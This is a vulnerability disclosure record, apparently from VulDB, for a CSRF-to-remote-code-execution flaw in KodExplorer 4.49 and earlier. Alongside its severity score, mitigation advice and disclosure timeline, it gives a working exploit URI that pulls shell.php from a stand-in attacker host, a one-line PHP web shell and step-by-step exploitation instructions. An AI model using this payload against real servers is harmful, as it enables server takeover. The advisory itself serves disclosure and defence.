| 제목 | KodExplorer <= 4.49 - Cross-site Request Forgery (CSRF) to Remote Code Execution (RCE) |
|---|
| 설명 | # Exploit Title: KodExplorer <= 4.49 - Cross-site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 2023-04-21
# Exploit Author: MrEmpy
# Version: <= 4.49
Title:
================
KodExplorer <= 4.49 - Cross-site Request Forgery (CSRF) to Remote Code Execution (RCE)
Summary:
================
KodExplorer version 4.49 or earlier contains a vulnerability that has been rated critical. The vulnerability allows a malicious user to trick the target into clicking on a malicious link, which will result in a malicious file being uploaded to the target's server. The attack is based on Cross-site Request Forgery and depends on target interaction for it to be successfully executed.
Severity Level:
================
9.0 (High)
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
Affected Product:
================
KodExplorer <= 4.49
Proof of Concept:
================
Note: I have attached an exploit demonstrating the vulnerability along with print screens.
URL: https://www.mediafire.com/file/709i2vxybergtg7/poc.zip/file
Zip password: m@knwMByu9pf4^UZWyB3WX@*6YznD2C9V*yqA4Yi@J
The request method used in the vulnerable function is GET, so the payload is based on this URI:
http://target.tld/index.php?explorer/serverDownload&type=download&savePath=/var/www/html/data/User/admin/home/&url=http://attacker.tld/shell.php&uuid=&time=
savePath: Where the PHP file that would allow the attacker to execute code on the machine will be saved. It is important to know the path where the application is hosted (eg /var/www/html/).
url: URL of the attacker's web server, where it is storing the PHP file called shell.php that will be sent to the machine after the target accesses the malicious URL.
After assembling the payload, follow these steps:
1. Log into the KodExplorer application simulating the target
2. Configure the attacker's web server and PHP file with this payload:
<pre><?php system($_GET["cmd"])?></pre>
3. Access the malicious URI. You will get a message saying that shell.php was sent successfully
4. After successful submission, go to http://target.tld/data/User/admin/home/shell.php?cmd=id
Exploit example:
Attacker:
[1.png]
Victim open URL:
[2.png]
Attacker manages to get a web shell on the system:
[3.png]
Reverse shell
Attacker:
[4.png]
Victim:
[5.png]
Attacker:
[6.png]
Mitigation
Considering that it is a CSRF-based flaw, it is recommended that there is functionality to block these types of attacks, such as an anti-CSRF token.
Change the GET request method to POST.
Vulnerability Disclosure Schedule:
================
* October 17, 2022: An issue note was created in the official repository (https://github.com/kalcaddle/KodExplorer/issues/512)
* November 3, 2022: I received a response with the email address to report the vulnerability
* Nov 3, 2022: I sent an email detailing the vulnerability
* April 21, 2023: I have not received any response and the current product version is 4.51 |
|---|
| 원천 | ⚠️ https://github.com/kalcaddle/KodExplorer/issues/512 |
|---|
| 사용자 | mrempy (UID 24379) |
|---|
| 제출 | 2023. 04. 21. AM 07:45 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 04. 21. PM 04:01 (8 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 227000 [kalcaddle KodExplorer 까지 4.49 교차 사이트 요청 위조] |
|---|
| 포인트들 | 20 |
|---|